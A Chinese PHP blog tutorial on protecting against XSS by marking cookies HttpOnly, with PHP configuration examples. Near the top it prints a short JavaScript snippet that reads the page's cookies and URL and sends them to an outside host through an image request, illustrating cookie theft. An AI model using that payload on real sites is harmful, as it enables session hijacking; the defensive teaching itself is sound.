编程 PHP

xss防御之php利用httponly防xss攻击

Posted in PHP onMarch 21, 2014

xss的概念就不用多说了，它的危害是极大的，这就意味着一旦你的网站出现xss漏洞，就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持，如果这里面包含了大量敏感信息（身份信息，管理员信息）等，那完了。。。

如下js获取cookie信息：

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是从document对象中获取的，现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数，跟domain等其他参数一样，一旦这个HttpOnly被设置，你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly：

//在php.ini中，session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

对于PHP5.1以前版本的PHP通过：

header("Set-Cookie: hidden=value; httpOnly");

最后，HttpOnly不是万能的！

xss防御之php利用httponly防xss攻击

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

wiki-shan写的php在线加密的解密程序

Sep 07 PHP

用PHP实现的四则运算表达式计算实现代码

Aug 02 PHP

mysql,mysqli,PDO的各自不同介绍

Sep 19 PHP

解密ThinkPHP3.1.2版本之模块和操作映射

Jun 19 PHP

php采用curl访问域名返回405 method not allowed提示的解决方法

Jun 26 PHP

实用的PHP带公钥加密类分享(每次加密结果都不一样哦)

Aug 20 PHP

php生成随机颜色方法汇总

Dec 03 PHP

如何把php5.3版本升级到php5.4或者php5.5

Jul 31 PHP

Laravel+jQuery实现AJAX分页效果

Sep 14 PHP

phpcms中的评论样式修改方法

Oct 21 PHP

详谈phpAdmin修改密码后拒绝访问的问题

Apr 03 PHP

PHP给前端返回一个JSON对象的实例讲解

May 31 PHP

php5.3 goto函数介绍和示例

Mar 21 #PHP

php ctype函数中文翻译和示例

Mar 21 #PHP

php的declare控制符和ticks教程(附示例)

Mar 21 #PHP

php像数组一样存取和修改字符串字符

Mar 21 #PHP

easyui的tabs update正确用法分享

Mar 21 #PHP

php设置session值和cookies的学习示例

Mar 21 #PHP

一个显示效果非常不错的PHP错误、异常处理类

Mar 21 #PHP

You might like

PHP令牌 Token改进版

2008/07/18 PHP

变量在 PHP7 内部的实现（二）

2015/12/21 PHP

10个基于Jquery的幻灯片插件教程

2010/10/29 Javascript

javascript Array对象基础知识小结

2010/11/16 Javascript

再论Javascript的类继承

2011/03/05 Javascript

js根据给定的日期计算当月有多少天实现思路及代码

2013/02/25 Javascript

基于jQuery实现仿百度首页选项卡切换效果

2016/05/29 Javascript

JS中parseInt()和map()用法分析

2016/12/16 Javascript

JS验证字符串功能

2017/02/22 Javascript

推荐三款不错的图片压缩上传插件(webuploader、localResizeIMG4、LUploader)

2017/04/21 Javascript

vue.js利用defineProperty实现数据的双向绑定

2017/04/28 Javascript

Angular实现图片裁剪工具ngImgCrop实践

2017/08/17 Javascript

简单学习5种处理Vue.js异常的方法

2019/06/17 Javascript

如何基于layui的laytpl实现数据绑定的示例代码

2020/04/10 Javascript

JavaScript实现鼠标移入随机变换颜色

2020/11/24 Javascript

[51:28]EG vs Mineski 2018国际邀请赛小组赛BO2 第一场 8.16

2018/08/16 DOTA

[47:03]完美世界DOTA2联赛PWL S3 Galaxy Racer vs Phoenix 第二场 12.10

2020/12/13 DOTA

Python开发实例分享bt种子爬虫程序和种子解析

2014/05/21 Python

Python实现统计文本文件字数的方法

2017/05/05 Python

动态规划之矩阵连乘问题Python实现方法

2017/11/27 Python

python自动重试第三方包retrying模块的方法

2018/04/24 Python

对Python 检查文件名是否规范的实例详解

2019/06/10 Python

python使用原始套接字发送二层包(链路层帧)的方法

2019/07/22 Python

python读取Kafka实例

2019/12/23 Python

python路径的写法及目录的获取方式

2019/12/26 Python

基于Tensorflow读取MNIST数据集时网络超时的解决方式

2020/06/22 Python

详解python变量与数据类型

2020/08/25 Python

Ray-Ban雷朋美国官网：全球领先的太阳眼镜品牌

2016/07/20 全球购物

宣传普通话标语

2014/06/27 职场文书

餐厅周年庆活动方案

2014/08/25 职场文书

村党的群众路线教育实践活动总结材料

2014/10/31 职场文书

护士2014年终工作总结

2014/11/11 职场文书

2019年度行政文员工作计划范本！

2019/07/04 职场文书

人事行政部各岗位职责说明书！

2019/07/15 职场文书

mysql中数据库覆盖导入的几种方式总结

2022/03/25 MySQL

html解决浏览器记住密码输入框的问题

2023/05/07 HTML / CSS